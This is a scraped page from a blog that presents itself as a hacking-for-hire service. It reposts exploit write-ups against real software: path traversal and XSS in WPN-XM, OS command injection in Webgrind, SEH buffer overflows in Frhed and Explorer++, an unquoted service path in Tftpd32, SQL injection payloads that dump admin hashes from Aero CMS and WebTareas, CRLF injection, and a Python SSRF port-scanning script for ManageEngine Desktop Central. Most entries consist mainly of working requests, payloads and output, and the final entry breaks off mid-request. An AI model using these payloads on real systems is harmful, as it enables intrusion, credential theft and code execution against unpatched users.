Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863584396

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on:  Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

    Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.

Proof of concept:

To detect: http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server.

Example, In C:\:hello.php with this content:

C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>


To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello

Note: hello without ".php".

And you can see the PHP message into the browser at the start.

Response:

HELLO FROM C:\hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="utf-8" />
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>WP?-XM Server Stack for Windows - 0.8.6</title>
    <meta name="description" content="WP?-XM Server Stack for Windows -
Webinterface.">
    <meta name="author" content="Jens-André Koch" />
    <link rel="shortcut icon" href="favicon.ico" />



# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.

Proof of concept:

http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E
HireHackking 
# Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://github.com/jokkedk/webgrind/
# Software Link : http://github.com/jokkedk/webgrind/
# Tested Version: 1.1
# Tested on:  Windows 10 using XAMPP

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434

Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.

Proof of concept:

http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph

And the calc.exe opens.

Note: 0'&calc.exe&', & char is neccesary to execute the command.


# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Webgrind v1.1 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,
in file parameter.

Proof of concept:

http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E

Response:
...
<title>
webgrind - fileviewer: </title><script>alert(1);</script><title> </title>
<script type="text/javascript" charset="utf-8">
HireHackking 
# Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://frhed.sourceforge.net/
# Software Link : http://frhed.sourceforge.net/
# Tested Version: 1.6.0
# Tested on:  Windows 10

CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119

Buffer overflow controlling the Structured Exception Handler (SEH) records
in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow
attackers to execute arbitrary code via a long file name argument.

Proof of concept:

Open Frhed.exe from command line with a large string in Arguments, more
than 494 chars:

File '<Frhed_PATH>\Frhed.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'

SEH chain of main thread
Address    SE handler
0018FC8C   41367141
35714134   *** CORRUPT ENTRY ***

0BADF00D   [+] Examining SEH chain
0BADF00D       SEH record (nseh field) at 0x0018fc8c overwritten with
normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic
data after the handler

0BADF00D   ------------------------------
                       'Targets'        =>
                           [
                               [ '<fill in the OS/app version here>',
                                   {
                                       'Ret'         =>    0x00401ba7, #
pop ecx # pop ecx # ret    - Frhed.exe (change this value by other without
\x00)
                                       'Offset'    =>    494
                                   }
                               ],
                           ],
HireHackking 
# Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://www.explorerplusplus.com/
# Software Link : http://www.explorerplusplus.com/
# Tested Version: 1.3.5.531
# Tested on:  Windows 10

CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119

Buffer overflow controlling the Structured Exception Handler (SEH) records
in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers
to execute arbitrary code via a long file name argument.

Proof of concept:

Open Explorer32++.exe from command line with a large string in Arguments,
more than 396 chars:

File '<Explorer++_PATH>\Explorer32++.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'

SEH chain of main thread
Address    SE handler
0018FB14   00690041
00370069   *** CORRUPT ENTRY ***

0BADF00D   [+] Examining SEH chain
0BADF00D       SEH record (nseh field) at 0x0018fb14 overwritten with
unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
data after the handler
HireHackking
# Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 10-13-2022 # Vendor Homepage: https://pjo2.github.io/tftpd64/ # Software Links : https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe # Tested Version: 4.60 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto C:\>sc qc Tftpd32_svc NOMBRE_SERVICIO: Tftpd32_svc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Tftpd32 service edition DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking

Aero CMS v0.0.1 - SQL Injection (no auth)

HACKER · %s · %s

# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example SQL Injection ----------------------------------------------------------------------------------------------------------------------- Param: search ----------------------------------------------------------------------------------------------------------------------- Req sql ini detect ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692'&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3466 Connection: close Content-Type: text/html; charset=UTF-8 [...] Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692''&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94216 [...] ----------------------------------------------------------------------------------------------------------------------- Req exploiting sql ini get data admin ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 113 search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 05:40:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 101144 [...] <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a> [...] ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [filename] /AeroCMS-master/admin/profile.php [filename] /AeroCMS-master/author_posts.php [author] /AeroCMS-master/category.php [category] /AeroCMS-master/post.php [p_id] /AeroCMS-master/search.php [search] /AeroCMS-master/admin/categories.php [cat_title] /AeroCMS-master/admin/categories.php [phpwcmsBELang cookie] /AeroCMS-master/admin/posts.php [post_content] /AeroCMS-master/admin/posts.php [p_id] /AeroCMS-master/admin/posts.php [post_category_id] /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [reset]
HireHackking
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-02-14 # Software Link : http://www.desktopcentral.com # Tested Version: 9.1.0 (Build No: 91084) # Tested on: Windows 10 # Vulnerability Type: CRLF injection (CRLF) - 1 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost Response: HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv X-dc-header: yes Content-Length: 95 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/csv;charset=UTF-8 # Vulnerability Type: CRLF injection (CRLF) - 2 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 X-dc-header: yes Content-Length: 4470 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf;charset=UTF-8 # Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3: 8.0 CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CWE: CWE-918 Server-Side Request Forgery (SSRF) Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability in ManageEngine Desktop Central 9.1.0 allows an attacker can force a vulnerable server to trigger malicious requests to third-party servers or to internal resources. This vulnerability allows authenticated attacker with network access via HTTP and can then be leveraged to launch specific attacks such as a cross-site port attack, service enumeration, and various other attacks. Proof of concept: Save this content in a python file (ex. ssrf_manageenginedesktop9.py), change the variable sitevuln value with ip address: import argparse from termcolor import colored import requests import urllib3 import datetime urllib3.disable_warnings() print(colored(''' ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ ''',"red")) def smtpConfig_ssrf(target,port,d): now1 = datetime.datetime.now() text = '' sitevuln = 'localhost' url = 'https:// '+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% 40manageengine.com &validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% 40manageengine.com' cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' try: response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10) text = response.text now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if ('updateRefMsgCookie' in text): return colored('Cookie lost',"yellow") if d == "0": print ('Time response: ' + str(rest) + '\n' + text + '\n') if (seconds > 5.0): return colored('open',"green") else: return colored('closed',"red") except: now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if (seconds > 10.0): return colored('open',"green") else: return colored('closed',"red") return colored('unknown',"yellow") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False) args = parser.parse_args() timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) print (args.ip + ':' + args.port + ' ' + timeresp + '\n') And: $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:8080 open $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:7777 closed
HireHackking

WebTareas 2.4 - SQL Injection (Unauthorised)

HACKER · %s · %s

# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: webTareasSID in cookie ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/administration/admin.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout Connection: close Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'' Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Sat, 15 Oct 2022 11:38:50 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../service_site/home.php?msg=permissiondenied Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/administration/admin.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout Connection: close Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z' Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Sat, 15 Oct 2022 11:38:39 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../service_site/home.php?msg=permissiondenied Content-Length: 355 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /> <b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br /> ----------------------------------------------------------------------------------------------------------------------- SQLMap: ----------------------------------------------------------------------------------------------------------------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: Cookie #1* ((custom) HEADER) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 [11:49:03] [INFO] testing MySQL [11:49:03] [INFO] confirming MySQL do you want to URL encode cookie values (implementation specific)? [Y/n] Y [11:49:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.4.30, Apache 2.4.54 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [11:49:03] [INFO] fetching database names [11:49:04] [INFO] starting 6 threads [11:49:06] [INFO] retrieved: 'zxcv' [11:49:06] [INFO] retrieved: 'information_schema' [11:49:06] [INFO] retrieved: 'performance_schema' [11:49:06] [INFO] retrieved: 'test' [11:49:06] [INFO] retrieved: 'phpmyadmin' [11:49:06] [INFO] retrieved: 'mysql' available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] zxcv [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1' [11:49:06] [WARNING] your sqlmap version is outdated [*] ending @ 11:49:06 /2022-10-15/
HireHackking

WebTareas 2.4 - Reflected XSS (Unauthorised)

HACKER · %s · %s

# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Proof Of Concept ----------------------------------------------------------------------------------------------------------------------- Param: searchtype ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET 